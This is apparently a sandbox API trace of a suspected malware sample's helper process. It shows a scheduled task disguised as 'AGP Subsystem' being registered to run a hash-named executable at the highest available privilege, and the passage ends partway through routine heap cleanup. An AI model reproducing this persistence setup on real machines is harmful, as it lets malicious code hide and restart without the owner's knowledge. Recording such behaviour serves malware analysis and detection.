[0169.628] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.628] lstrlenW (lpString="-/") returned 2
[0169.628] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0169.628] SetLastError (dwErrCode=0x490)
[0169.628] SetLastError (dwErrCode=0x490)
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.628] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp"
[0169.628] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.628] _memicmp (_Buf1=0x304ce0, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] _memicmp (_Buf1=0x304d10, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] SetLastError (dwErrCode=0x7a)
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] lstrlenW (lpString="C") returned 1
[0169.629] SetLastError (dwErrCode=0x490)
[0169.629] SetLastError (dwErrCode=0x0)
[0169.629] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.629] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.629] GetProcessHeap () returned 0x2f0000
[0169.629] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x64) returned 0x306a20
[0169.629] SetLastError (dwErrCode=0x0)
[0169.629] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.629] SetLastError (dwErrCode=0x0)
[0169.629] GetProcessHeap () returned 0x2f0000
[0169.629] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x1fc) returned 0x306a90
[0169.629] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0169.644] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0169.671] CoCreateInstance (in: rclsid=0x2c230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x2c20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x28d148 | out: ppv=0x28d148*=0x5a3dd0) returned 0x0
[0169.684] TaskScheduler:ITaskService:Connect (This=0x5a3dd0, serverName=0x28d0b8*(varType=0x8, wReserved1=0x0, wReserved2=0xd12c, wReserved3=0x28, varVal1=0x0, varVal2=0x28da00), user=0x28d0c8*(varType=0x0, wReserved1=0x28, wReserved2=0xd150, wReserved3=0x28, varVal1=0x75419cde, varVal2=0x28da00), domain=0x28d0d8*(varType=0x0, wReserved1=0x0, wReserved2=0x1f4, wReserved3=0x0, varVal1=0x6, varVal2=0x0), password=0x28d0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7541, varVal1=0x74, varVal2=0x28db80)) returned 0x0
[0169.691] TaskScheduler:IUnknown:AddRef (This=0x5a3dd0) returned 0x2
[0169.691] TaskScheduler:ITaskService:GetFolder (in: This=0x5a3dd0, Path=0x0, ppFolder=0x28d1ec | out: ppFolder=0x28d1ec*=0x5a3e38) returned 0x0
[0169.693] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x110
[0169.693] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x28cadc | out: lpFileSize=0x28cadc*=1358) returned 1
[0169.693] ReadFile (in: hFile=0x110, lpBuffer=0x28cae4, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x28caec, lpOverlapped=0x0 | out: lpBuffer=0x28cae4*, lpNumberOfBytesRead=0x28caec*=0x2, lpOverlapped=0x0) returned 1
[0169.693] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0169.693] malloc (_Size=0x54f) returned 0x5a24e8
[0169.693] ReadFile (in: hFile=0x110, lpBuffer=0x5a24e8, nNumberOfBytesToRead=0x54f, lpNumberOfBytesRead=0x28caec, lpOverlapped=0x0 | out: lpBuffer=0x5a24e8*, lpNumberOfBytesRead=0x28caec*=0x54e, lpOverlapped=0x0) returned 1
[0169.693] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x5a24e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1359
[0169.694] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x5a24e8, cbMultiByte=-1, lpWideCharStr=0x314fd4, cchWideChar=1359 | out: lpWideCharStr="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 1359
[0169.694] SysStringLen (param_1="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 0x54e
[0169.694] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n", pbstrResult=0x28ca8c | out: pbstrResult=0x28ca8c) returned 0x0
[0169.695] free (_Block=0x5a24e8)
[0169.695] CloseHandle (hObject=0x110) returned 1
[0169.695] lstrlenW (lpString="") returned 0
[0169.695] malloc (_Size=0xc) returned 0x5a3ea0
[0169.695] SysStringLen (param_1="") returned 0x0
[0169.695] free (_Block=0x5a3ea0)
[0169.695] lstrlenW (lpString="") returned 0
[0169.696] ITaskFolder:RegisterTask (in: This=0x5a3e38, Path="AGP Subsystem", XmlText="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n", flags=6, UserId=0x28cac8*(varType=0x8, wReserved1=0x0, wReserved2=0x4178, wReserved3=0x31, varVal1="", varVal2=0x314178), password=0x28cad8*(varType=0x0, wReserved1=0x31, wReserved2=0x0, wReserved3=0x0, varVal1=0x28cb60, varVal2=0x76987526), LogonType=0, sddl=0x28caec*(varType=0x0, wReserved1=0x31, wReserved2=0x4178, wReserved3=0x31, varVal1=0x0, varVal2=0x0), ppTask=0x28cb4c | out: ppTask=0x28cb4c*=0x5a3ec8) returned 0x0
[0169.829] GetProcessHeap () returned 0x2f0000
[0169.829] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305738
[0169.830] _memicmp (_Buf1=0x304c80, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.830] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x306718, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0169.830] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0169.830] GetProcessHeap () returned 0x2f0000
[0169.830] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x82) returned 0x314d20
[0169.830] _vsnwprintf (in: _Buffer=0x28cb58, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x28cafc | out: _Buffer="SUCCESS: The scheduled task \"AGP Subsystem\" has successfully been created.\n") returned 75
[0169.830] _fileno (_File=0x754b2920) returned 1
[0169.830] _errno () returned 0x5a07d8
[0169.830] _get_osfhandle (_FileHandle=1) returned 0x7
[0169.830] _errno () returned 0x5a07d8
[0169.830] GetFileType (hFile=0x7) returned 0x2
[0169.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0169.830] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28cac0 | out: lpMode=0x28cac0) returned 1
[0169.831] __iob_func () returned 0x754b2900
[0169.831] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0169.831] lstrlenW (lpString="SUCCESS: The scheduled task \"AGP Subsystem\" has successfully been created.\n") returned 75
[0169.831] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x28cb58*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x28cae8, lpReserved=0x0 | out: lpBuffer=0x28cb58*, lpNumberOfCharsWritten=0x28cae8*=0x4b) returned 1
[0169.832] IUnknown:Release (This=0x5a3ec8) returned 0x0
[0169.832] TaskScheduler:IUnknown:Release (This=0x5a3e38) returned 0x0
[0169.832] TaskScheduler:IUnknown:Release (This=0x5a3dd0) returned 0x1
[0169.832] lstrlenW (lpString="") returned 0
[0169.832] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.832] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50
[0169.832] GetProcessHeap () returned 0x2f0000
[0169.832] GetProcessHeap () returned 0x2f0000
[0169.832] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a90) returned 1
[0169.832] GetProcessHeap () returned 0x2f0000
[0169.832] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306a90) returned 0x1fc
[0169.833] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a90 | out: hHeap=0x2f0000) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a20) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306a20) returned 0x64
[0169.833] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a20 | out: hHeap=0x2f0000) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305398) returned 0x16
[0169.834] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398 | out: hHeap=0x2f0000) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2ff058) returned 0x10
[0169.834] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058 | out: hHeap=0x2f0000) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3053b8) returned 0x14
[0169.834] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8 | out: hHeap=0x2f0000) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306670) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306670) returned 0xa0
[0169.835] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306670 | out: hHeap=0x2f0000) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c68) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c68) returned 0x10
[0169.835] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c68 | out: hHeap=0x2f0000) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305278) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305278) returned 0x14
[0169.835] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305278 | out: hHeap=0x2f0000) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306978) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306978) returned 0x68
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306978 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304d10) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304d10) returned 0x10
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304d10 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305238) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305238) returned 0x14
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305238 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cf8) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304cf8) returned 0xc
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cf8 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.837] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ce0) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304ce0) returned 0x10
[0169.837] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ce0 | out: hHeap=0x2f0000) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305218) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305218) returned 0x14
[0169.837] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305218 | out: hHeap=0x2f0000) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305a80) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305a80) returned 0x208
[0169.837] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305a80 | out: hHeap=0x2f0000) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.838] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c08) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c08) returned 0x10
[0169.838] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c08 | out: hHeap=0x2f0000) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051d8) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3051d8) returned 0x14
[0169.838] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051d8 | out: hHeap=0x2f0000) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306718) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306718) returned 0x200
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306718 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c80) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c80) returned 0x10
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c80 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305178) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305178) returned 0x14
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305178 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052f8) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3052f8) returned 0x14
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052f8 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cc8) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304cc8) returned 0x10
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cc8 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050e0) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3050e0) returned 0x14
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050e0 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305338) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305338) returned 0x16
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305338 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c98) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c98) returned 0x10
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c98 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050c0) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3050c0) returned 0x14
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050c0 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304f90) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304f90) returned 0x2
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304f90 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fa0) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304fa0) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fa0 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fc0) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304fc0) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fc0 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fe0) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304fe0) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fe0 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305000) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305000 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305298) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305298) returned 0x14
[0169.842] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305298 | out: hHeap=0x2f0000) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052b8) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3052b8) returned 0x14
[0169.842] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052b8 | out: hHeap=0x2f0000) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306920) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306920) returned 0x30
[0169.843] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306920 | out: hHeap=0x2f0000) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052d8) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3052d8) returned 0x14
[0169.843] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052d8 | out: hHeap=0x2f0000) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3069e8) returned 0x30
